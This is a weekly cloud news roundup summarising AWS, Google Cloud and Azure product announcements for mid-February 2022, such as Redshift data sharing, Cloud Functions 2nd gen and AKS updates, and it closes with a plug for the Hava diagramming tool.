This week's roundup of all the cloud news.
Here's a cloud round up of all things GCP, Azure and AWS for the week ending Friday 18th February 2022
To stay in the loop, make sure you subscribe using the box on the right of this page.
Of course we'd love to keep in touch at the usual places. Come and say hello on:
AWS Updates and Releases
Source: aws.amazon.com
Introducing auto-adjusting budgets
Starting this week, you can use AWS Budgets to create auto-adjusting budgets. An auto-adjusting budget dynamically sets your budget amount based on historical cost or usage over a time range that you specify. This reduces the guesswork in setting a budget limit and keeps you updated as your spend patterns change. Auto-adjusting budgets are generally available in all public AWS Regions.
With this launch, you can set a budget method based on fixed, planned or auto-adjusting limits. If you’re looking to catch spikes in cloud spend, use auto-adjusting budgets to receive alerts when your cost or usage patterns change as a complement to your existing budgets. At the beginning of each new period, AWS Budgets calculates your auto-adjusted budget amount using historical billing data within the specified time range.
Amazon RDS now supports Internet Protocol Version 6 (IPv6) on RDS Management APIs
Amazon Relational Database Service (Amazon RDS) now offers AWS customers the option to use Internet Protocol version 6 (IPv6) while accessing the RDS Management APIs. Customers moving to IPv6 can simplify their network stack by running their APIs on a network that supports both IPv4 and IPv6.
Amazon MQ is now available in Africa (Cape Town) Region
Amazon MQ is now available in a total of 25 regions, with the addition of the Africa (Cape Town) region.
Amazon MQ is a managed message broker service for Apache ActiveMQ and RabbitMQ that makes it easier to set up and operate message brokers on AWS. Amazon MQ reduces your operational responsibilities by managing the provisioning, setup, and maintenance of message brokers for you. Because Amazon MQ connects to your current applications with industry-standard APIs and protocols, you can more easily migrate to AWS without having to rewrite code.
This week, Amazon CloudWatch Container Insights added metric collection support for your applications running on Amazon Elastic Kubernetes Service (EKS) with AWS Fargate using AWS Distro for OpenTelemetry (ADOT). ADOT is a secure, AWS-supported distribution of the OpenTelemetry project. Customers can now easily collect EKS Fargate metrics, such as CPU, memory, disk, and network, and analyze them along with other container metrics in Amazon CloudWatch. This helps customers observe the performance and resource utilization of their applications directly in the CloudWatch Container Insights console.
AWS introduces s2n-quic, a new open-source implementation of the QUIC protocol
AWS were pleased to announce the availability of s2n-quic, an open-source Rust implementation of the QUIC protocol, in the AWS encryption open-source libraries. AWS are also renaming s2n, AWS’s open-source C implementation of the TLS protocol, to s2n-tls. s2n-quic has an API that is designed to be fast and small, with simplicity as a priority. It is written in Rust, so it reaps some of its benefits like performance, thread and memory-safety. For the TLS 1.3 handshake, s2n-quic depends on s2n-tls, or Rustls, an open source Rust implementation of TLS.
Announcing Amazon Redshift Cross-region data sharing
Amazon Redshift data sharing allows you to share live, transactionally consistent data across different Redshift clusters without the complexity and delays associated with data copies and data movement. Ability to share data across clusters that are in the same AWS account and across accounts is already available. Now sharing data across Redshift clusters in different AWS Regions is generally available. Cross-Region data sharing is supported on all Amazon Redshift RA3 node types.
Announcing Automatic Workload Management for Amazon Redshift Concurrency Scaling
Amazon Redshift now offers more efficient query processing for Redshift Concurrency Scaling clusters. Concurrency Scaling automatically adds and removes capacity to handle unpredictable demand from thousands of concurrent users.
Automatic Workload Management(AutoWLM) is designed to process queries more efficiently and is now enabled with Concurrency Scaling clusters.
AutoWLM uses machine learning to enable Amazon Redshift to predict and manage memory usage and query concurrency. Redshift clusters when configured to use AutoWLM, will now also use AutoWLM for Concurrency Scaling clusters. You can monitor your Concurrency Scaling usage using Amazon Redshift Console.
AWS Resource Access Manager achieves PCI DSS Compliance
AWS Resource Access Manager (AWS RAM) is now a Payment Card Industry Data Security Standard (PCI DSS) compliant service. AWS RAM helps you securely share your AWS resources across AWS accounts or within your organization or organizational units (OUs) in AWS Organizations, or with AWS Identity and Access Management (IAM) roles and IAM users for supported resource types.
You can now use AWS RAM to share resources that may capture, transmit, and retrieve sensitive payment card data for use cases such as payment processing that are subject to PCI DSS.
Amazon Redshift announces support for unloading data to JSON files
Amazon Redshift adds support for unloading SQL query results to Amazon S3 in JSON format, a lightweight and widely used data format that supports schema definition. With the UNLOAD command in Amazon Redshift, you can now use JSON in addition to already supported delimited text, CSV, and Apache Parquet formats.
Using JSON format with your UNLOAD statement, you can write your query results to JSON files with each line containing a JSON object, representing a full record in the query result. Amazon Redshift supports writing nested JSON data when your query result contains columns using SUPER, the native Amazon Redshift data type to store semi-structured data or documents as values.
AWS Security Hub launches 13 controls and two partners for security posture monitoring
AWS Security Hub has released 13 new controls for its Foundational Security Best Practice standard (FSBP) to enhance customers’ Cloud Security Posture Management (CSPM). These controls conduct fully-automatic checks against security best practices for Amazon CloudFront, Amazon EC2, Amazon OpenSearch, Amazon Relational Database Service (RDS), Amazon Simple Storage Service (S3), and AWS Virtual Private Network (VPN).
If you have Security Hub set to automatically enable new controls and are already using AWS Foundational Security Best Practices, these controls are enabled by default. Security Hub now supports 175 security controls to automatically check your security posture in AWS.
AWS OpsWorks for Configuration Management now supports new version of Chef Automate
AWS OpsWorks for Configuration Management now supports the new version of Chef Automate for its managed service. Customers benefit from receiving the update automatically during the weekly system maintenance window scheduled individually by each customer.
Chef Automate now runs with Chef Automate version 20220103112354 and Chef Infra Server version 14.11.36. With these versions, customers benefit from many improvements, bugfixes and increased security such as protection from the log4j vulnerability. You can visit Chef Automate’s release notes for a complete overview of the changes and backwards incompatibilities such as changes to creation of teams and permissions.
Amazon CodeGuru Reviewer now detects Apache Log4j and other log injection vulnerabilities in code
Amazon CodeGuru is a developer tool powered by machine learning that provides intelligent recommendations to detect security vulnerabilities, improve code quality, and identify an application’s most expensive lines of code.
This week AWS announced a new log injection detector that analyzes your Java or Python code for potentially unsafe logging statements, including those that could be leveraged by the Apache Log4j issue. This works by confirming your code prevents attackers from forging log entries, injecting malicious content into logs, or remote code execution (RCE). When a log injection vulnerability is found, CodeGuru Reviewer provides an actionable recommendation from a repository analysis in the CodeGuru console or as a pull request comment.
CodeGuru Reviewer launches new Detector Library and example repositories
Amazon CodeGuru is a developer tool powered by machine learning that provides intelligent recommendations to detect security vulnerabilities, improve code quality and identify an application’s most expensive lines of code.
This week, AWS announced the new CodeGuru Reviewer Detector Library. The CodeGuru Reviewer Detector Library is a resource that contains detailed information about CodeGuru Reviewer’s security and code quality detectors. Each detection page within the Detector Library contains a description of the detector, non-compliant and compliant example code snippets, severity, and additional information that will help developers mitigate its risks (such as CWE numbers). This new resource will help AWS customers get a deeper understanding of the capabilities of CodeGuru Reviewer and can also be used as an educational resource to help customers improve the security posture of their applications.
Amazon Braket adds support for the new 80-qubit quantum processor from Rigetti
Amazon Braket, the quantum computing service from AWS, makes it easy for customers to conduct scientific research and software development with quantum computers. Today, we are excited to announce that Amazon Braket has added support for the new 80-qubit superconducting gate-based quantum processor from Rigetti named Aspen-M-1. With this launch, customers will be able to utilize a multi-chip quantum processor architecture for the first time on Braket. With the new 80-qubit processor, customers can run quantum circuits up to twice the qubit count supported by the previous generation Rigetti device, enabling them to tackle larger problems.
AWS WAF announced the launch of AWS WAF Fraud Control - Account Takeover Prevention to protect your application’s login page against credential stuffing attacks, brute force attempts, and other anomalous login activities. Account Takeover Prevention enables you to proactively stop account takeover attempts at the network edge. With Account Takeover Prevention, you can prevent unauthorized access that may lead to fraudulent activities, or you can inform affected users so that they can take preventive action.
Account Takeover Prevention is offered through AWS Managed Rules. Once added to your AWS WAF web ACL, it compares usernames and passwords submitted to your application to credentials that have been compromised elsewhere on the web. It also monitors for anomalous login attempts coming from bad actors by correlating requests seen over time to detect and mitigate attacks like irregular login patterns, brute force attempts, and credential stuffing. Account Takeover Prevention is scoped down by default to act on your login page only. With optional JavaScript and iOS/Android SDK integrations, you can receive additional telemetry on devices that attempt to log in to your application to better protect your application against automated login attempts by bots. Account Takeover Prevention can also be used in conjunction with AWS WAF Bot Control and AWS Managed Rules to create a comprehensive defense layer against bots targeting your application.
Amazon Connect now provides CloudFormation support for integrations with third-party data
Amazon Connect now supports CloudFormation for its third-party data integrations service. Data integrations enable Amazon Connect customers to download data from third-party SaaS apps like CRMs, quality management, billing software, and order management solutions. You can now use AWS CloudFormation templates to help you deploy data integrations, along with the rest of your AWS infrastructure, in a secure, efficient, and repeatable way. For example, with data integrations, you can download knowledge articles from Salesforce via scheduled syncs and surface them in the Amazon Connect agent application as Wisdom articles, to help agents quickly resolve caller issues, while boosting their productivity.
Introducing Amazon EC2 C6a instances
Amazon Web Services (AWS) announces the general availability of compute optimized Amazon EC2 C6a instances. C6a instances are powered by 3rd generation AMD EPYC processors (code named Milan) with an all-core turbo frequency of up to 3.6 GHz, deliver up to 15% better compute price performance compared to C5a instances for a wide variety of workloads, and offer 10% lower cost than comparable x86-based EC2 instances. C6a instances are built on the AWS Nitro System, a combination of dedicated hardware and lightweight hypervisor, which delivers practically all of the compute and memory resources of the host hardware to your instances.
Amazon MQ now supports RabbitMQ version 3.9.13
Amazon MQ now provides support for RabbitMQ version 3.9.13. This update to RabbitMQ contains several fixes and enhancements compared to the previously supported version, RabbitMQ 3.8.26.
Announcing sub-millisecond read latencies for Amazon Elastic File System
Amazon Elastic File System (Amazon EFS) now supports sub-millisecond read latencies for all new and existing One Zone and Standard General Purpose file systems. Latency-sensitive applications such as content management systems, analytics, DevOps, and machine learning inference can now achieve read latencies as low as 600 microseconds on average.
AWS SSO Expands Support for Customer Compliance with PCI-DSS and IRAP
This week, AWS announced that AWS Single Sign-On (AWS SSO) has increased its alignment with customer compliance requirements for security and privacy. AWS SSO achieved Payment Card Industry – Data Security Standard (PCI DSS) compliance and is Information Security Registered Assessors Program (IRAP) assessed at the PROTECTED level. These are in addition to existing AWS SSO support for customer compliance with International Organization for Standardization (ISO), System and Organization Controls (SOC) 1, 2, and 3, Esquema Nacional de Seguridad (ENS) High, the Financial Market Supervisory Authority (FINMA) International Standard on Assurance Engagements (ISAE) 3000 Type 2 Report requirements, and Multi-Tier Cloud Security (MTCS). As a result, AWS customers have more opportunities to simplify multi-account access management and application authentication for environments that are subject to compliance standards.
Google Cloud Releases and Updates
Source: cloud.google.com
Node.js apps now support private dependencies hosted on an Artifact Registry Node.js package repository. To include private dependencies, list the Artifact Registry repository and configure settings for authenticating with the registry in your .npmrc file.
Python 3 apps now support private dependencies hosted on an Artifact Registry Python registry. To include private dependencies, add the Artifact Registry URL and the relevant packages in your requirements.txt file.
Artifact Registry
On-Demand Scanning for Go packages is now generally available.
You can scan your container images and identify Go package vulnerabilities.
BigQuery
Remote functions are now available for preview. Remote functions allow you to implement your function in other languages than SQL and Javascript, or with libraries or services which are not allowed in BigQuery user-defined functions.
The table clones feature in BigQuery is now in Preview. A table clone is a lightweight, writable copy of a table. You are only charged for storing the data in a table clone that differs from its base table.
The INFORMATION_SCHEMA.STREAMING_TIMELINE_* views are now generally available (GA).
The QUALIFY clause, which lets you filter the results of analytic functions in Google Standard SQL, is now generally available (GA).
BigQuery reliability guide is now available. This guide describes how to build solutions with BigQuery that meet your application's needs for availability, durability, consistency, and data recovery. Topics include the following:
- Import reliability - Managed storage, methods, load jobs, and the Storage Write API
- Query reliability - Slots, reservations, and job optimization.
- Read reliability - Read methods, consistency concerns including quotas and limits, and the Storage Read API.
- Disaster planning - Disaster considerations and their mitigation.
Cloud Build
Support for configuring triggers to use a particular service account is now generally available. To learn more, see Configuring user-specified service accounts.
Cloud CDN
Dynamic compression allows Cloud CDN to automatically compress responses as they are being served between the origin and the client. The size of the data sent over the network is reduced by 60% to 85% in typical cases. This feature is supported in Preview.
Cloud Functions
Cloud Functions has added support for low-configuration access to private dependencies on Artifact Registry in in Node.js and Python.
Cloud Functions has released Cloud Functions (2nd gen), available at the Preview release level. Cloud Functions (2nd gen) is Google Cloud's next-generation Functions-as-a-Service offering. This new version of Cloud Functions comes with an advanced feature set, giving you more powerful infrastructure, advanced control over performance and scalability, more control around the functions runtime, and triggers from over 90 event sources.
See the Cloud Functions (2nd gen) documentation for details.
Cloud Key Management Service
Virtru is now available as a supported Cloud EKM partner. See Supported key managers to learn more.
Cloud Load Balancing
Internal TCP/UDP Load Balancing now supports source-IP address session affinity (CLIENT_IP_NO_DESTINATION) in Public Preview.
Cloud Logging
You can now configure default storage regions and disabled _Default sinks for your Google Cloud organizations and all of their new projects and folders. For details, see Configure default resource settings for Logging.
You can now collect Apache Solr metrics and logs from the Ops Agent, starting with version 2.10.0. For more information, see Monitoring third-party applications: Solr.
You can now collect Apache Kafka metrics and logs from the Ops Agent, starting with version 2.10.0. For more information, see Monitoring third-party applications: Kafka.
You can now collect MongoDB logs from the Ops Agent, starting with version 2.10.0. For more information, see Collect logs from third-party applications: MongoDB.
Cloud Monitoring
You can now configure how missing data is treated in alerting policies. Currently, if data stops arriving, the alerting policy repeats the previous measurement, so open incidents stay open. You can now treat missing data as violating the condition so an active condition stays active, or treat it as non-violating so that an active condition closes. For more information, see Partial metric data.
You can now collect Apache Solr metrics and logs from the Ops Agent, starting with version 2.10.0. For more information, see Monitoring third-party applications: Solr.
You can now collect Apache Kafka metrics and logs from the Ops Agent, starting with version 2.10.0. For more information, see Monitoring third-party applications: Kafka.
You can now collect Apache CouchDB metrics from the Ops Agent, starting with version 2.10.0. For more information, see Monitoring third-party applications: CouchDB.
You can now collect Apache ZooKeeper metrics from the Ops Agent, starting with version 2.10.0. For more information, see Monitoring third-party applications: ZooKeeper.
You can now collect Elasticsearch metrics from the Ops Agent, starting with version 2.10.0. For more information, see Monitoring third-party applications: Elasticsearch.
Cloud NAT
Dynamic port allocation for Cloud NAT is available in General Availability.
Cloud SQL for MySQL
Cloud SQL now supports the use of tags on instances. Tags are key-value pairs you can apply to your resources, such as a project or a Cloud SQL instance, which are used for fine-grained access control. To learn more, see Access control with Google Cloud tags. To use tags now, see Attach and manage tags on Cloud SQL instances.
Cloud SQL for PostgreSQL
Cloud SQL now supports the use of tags on instances. Tags are key-value pairs you can apply to your resources, such as a project or a Cloud SQL instance, which are used for fine-grained access control. To learn more, see Access control with Google Cloud tags. To use tags now, see Attach and manage tags on Cloud SQL instances.
Cloud SQL for SQL Server
Cloud SQL now supports the use of tags on instances. Tags are key-value pairs you can apply to your resources, such as a project or a Cloud SQL instance, which are used for fine-grained access control. To learn more, see Access control with Google Cloud tags. To use tags now, see Attach and manage tags on Cloud SQL instances.
Data Catalog
Data Catalog now supports cataloguing and searching data entries from Dataplex lakes, zones, tables, and filesets. For more information, see the Dataplex documentation and Data Catalog documentation.
Dataflow
Profiling Dataflow pipelines with Cloud Profiler is generally available (GA). Use Dataflow integration with Cloud Profiler to monitor pipeline performance.
Dataplex
Dataplex is generally available (GA). Dataplex is an intelligent data fabric that helps organizations to centrally manage, monitor, and govern their data across data lakes, data warehouses, and data marts with consistent controls, providing access to trusted data and powering analytics at scale.
Dataproc
A script that checks if a project or organization is using an unsupported Dataproc image is available for downloading (see Unsupported Dataproc versions).
Memory Store for Redis
Added support for enabling read replicas (preview) on existing instances. For more information, see Behavior of enabling read replicas on an existing instance. Also added the capability to perform version upgrade and manual failover operations on instances that use read replicas.
Service Directory
Service Directory integration with Traffic Director is available in Preview .
After you register a service with Service Directory, the integration makes services in the service registry available to the applications in your mesh and to gateways configured by Traffic Director. Your service mesh and self- managed gateways can then send traffic to these services
Traffic Director
Traffic Director is now integrated with Service Directory. After you register a service with Service Directory, the integration makes services in the service registry available to the applications in your mesh and to gateways configured by Traffic Director. Your service mesh and self- managed gateways can then send traffic to these services.
Vertex AI
You can now use a pre-built container to perform custom training with TensorFlow 2.8.
Microsoft Azure Releases And Updates
Source: azure.microsoft.com
Public preview: Resource configuration changes
Resource configuration changes, a feature enabling the querying of changes to Azure resource configurations across subscriptions, management groups, and tenant, is now in public preview.
Public preview: Cross region virtual machine restore points
Create restore points in any region and copy restore points from one region to another.
General availability: Automatically delete a VM and its associated resources simultaneously
You can now automatically delete disks, NICs, and Public IPs associated with a VM at the same time you delete the VM.
In development: Price sheet download as a zip file
Price sheet download experience update for using Azure in a small business environment.
Generally available: New learning content on the Azure IoT Central homepage
The Azure IoT Central homepage has been refreshed with new learning content to help you start your IoT solution development.
Public preview: Azure Machine Learning February 2022 announcements
New features now available in public preview include automatic time series ID detection for automation, automatedML model’s training code generation, and move Azure Machine Learning workspaces between subscriptions.
Generally available: Azure Database for PostgreSQL – Hyperscale (Citus) new certifications
New compliance certifications are now available on Azure Database for PostgreSQL – Hyperscale (Citus), a managed service running the open-source Postgres database on Azure.
General availability: Azure Database for PostgreSQL – Hyperscale (Citus) additional regions available
Azure Database for PostgreSQL – Hyperscale (Citus) is now available in the Central US, South Central US, West Central US, and West US regions to distribute your Postgres database.
Generally available: Virtual Machine level disk bursting supports additional VM types
Handle unforeseen disk traffic spikes smoothly without the need to overprovision your virtual machine with virtual machine level disk bursting.
Public preview: Azure Tables extension for Azure Functions
Azure Functions has an updated Tables extension, now in its own NuGet package
General availability: Developer portal widget for embedding custom HTML code
Use custom HTML code widget to extend developer portal's functionality.
Generally available: Alert processing rules in Azure Monitor
Alert processing rules (formerly action rules) provide post-processing capabilities for fired alerts in Azure Monitor.
Public preview: App Service Environment v3 Migration Feature
Migration guidance allows you to move to App Service Environment v3 and take advantage of refreshed infrastructure, better performance, and the removal of the stamp fee found on older versions.
Public preview: Azure Monitor predictive autoscale for Azure virtual machine scale sets
Predictive autoscale for Azure virtual machine scale sets can manage and scale your virtual machine scale sets by observing and learning from historical CPU usage patterns.
Generally available: Hotpatch for Windows Server virtual machines
Hotpatch (reboot-less update) is now in general availability for Windows Server virtual machines as part of Azure Automanage for Windows Server.
Public preview: Kubernetes v1.23 support in AKS
Take advantage of new features in Kubernetes v1.23.
Now available: CIS benchmarks for Kubernetes
AKS now meets CIS benchmark standards for Kubernetes.
General availability: Azure tags support in AKS
You can now specify a tag, create or update of AKS cluster to track resource usage.
General availability: Azure Sphere version 22.02 expected on Feb 28, 2022
Participate in the retail evaluation now to ensure full compatibility. The OS evaluation period for 22.02 provides 14 days for backward compatibility testing.
Public preview: OCR supports 164 languages in the Cognitive Services Computer Vision
Computer Vision Read API for Optical Character Recognition (OCR), part of Cognitive Services, announces its public preview with support for new languages including Arabic, Hindi, and other regional languages with the same writing scripts. It also extends handwritten OCR support for Japanese and Korean, along with enhancements for handwritten dates, names, and amounts and general performance and AI quality enhancements.
Have you tried Hava automated diagrams for AWS, Azure and GCP. Get back your precious time and sanity and rid yourself of manual drag and drop diagram builders forever.
Hava automatically generates accurate fully interactive cloud infrastructure and security diagrams when connected to your AWS, Azure or GCP accounts. Once diagrams are created, they are kept up to date, hands free.
When changes are detected, new diagrams are auto-generated and the superseded documentation is moved to a version history. Older diagrams are also interactive, so can be opened and individual resources inspected interactively, just like the live diagrams.
Check it out for free here:
